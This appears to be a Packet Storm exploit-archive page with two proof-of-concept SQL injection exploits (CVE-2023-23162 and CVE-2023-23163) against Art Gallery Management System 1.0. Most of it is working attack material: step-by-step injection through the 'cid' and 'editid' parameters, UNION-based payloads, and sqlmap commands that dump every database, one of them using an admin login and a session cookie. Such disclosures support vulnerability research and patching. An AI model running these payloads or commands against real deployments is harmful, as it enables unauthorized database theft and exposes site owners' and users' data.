what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Art Gallery Management System Project 1.0 SQL Injection

Art Gallery Management System Project 1.0 SQL Injection
Posted Apr 3, 2023
Authored by Rahul Patwari

Art Gallery Management System Project version 1.0 suffers from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
advisories | CVE-2023-23162, CVE-2023-23163
SHA-256 | f61b713085d167089e636689d3db654dc730970503025537ed4d17e48b020de1

Art Gallery Management System Project 1.0 SQL Injection

Change Mirror Download
# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (sqli) Unauthenticated
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: XAMPP / Windows 10
# CVE : CVE-2023-23162

# Proof of Concept:

# 1- Install The application Art Gallery Management System Project v1.0
# 2- Navigate to the product page by clicking on the "ART TYPE" by selecting any of the categories on the menu.
# 3- Now insert a single quote ( ' ) on "cid" parameter to break the database query, you will see the output is not shown.
# 4- Now inject the payload double single quote ('') in the "cid" parameter to merge the database query and after sending this request the SQL query is successfully performed and the product is shown in the output.
# 5- Now find how many columns are returned by the SQL query. this query will return 6 columns.
Payload:cid=1%27order%20by%206%20--%20-&artname=Sculptures

# 6- for manually getting data from the database insert the below payload to see the user of the database.
payload: cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs

# 7- for automation using "SQLMAP" intercept the request and copy this request to a file called "request.txt".
# 8- now to get all database data use the below "sqlmap" command to fetch all the data.
Command: sqlmap -r request.txt -p cid --dump-all --batch

# Go to this url "
https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs
"



# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: XAMPP / Windows 10
# CVE : CVE-2023-23163

# Proof of Concept:

# 1- Install The application Art Gallery Management System Project v1.0

# 2- Navigate to admin login page and login with the valid username and password<admin:Test@123>.
URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php

# 3- Now navigate "Manage ART TYPE" by clicking on "ART TYPE" option on left side bar.

# 4- Now click on any of the Art Type "Edit" button and you will redirect to the edit page of art type.

# 5- Now insert a single quote ( ' ) on "editid" parameter to break the database query, you will see the output is not shows.

# 6- Now inject the payload double single quote ('') in the "editid" parameter to merge the database query and after sending this request the SQL query is successfully performed and product is shows in the output.

# 7- Now find how many column are returns by the SQL query. this query will return 6 column.
Payload:editid=6%27order%20by%203%20--%20-

# 8- For manually get data of database insert the below payload to see the user of the database.
payload: editid=-6%27union%20all%20select%201,user(),3--%20-

# 9- Now to get all database data use below "sqlmap" command to fetch all the data.
Command: sqlmap http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=6 --cookie="PHPSESSID=hub8pub9s5c1j18cva9594af3q" --dump-all --batch


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close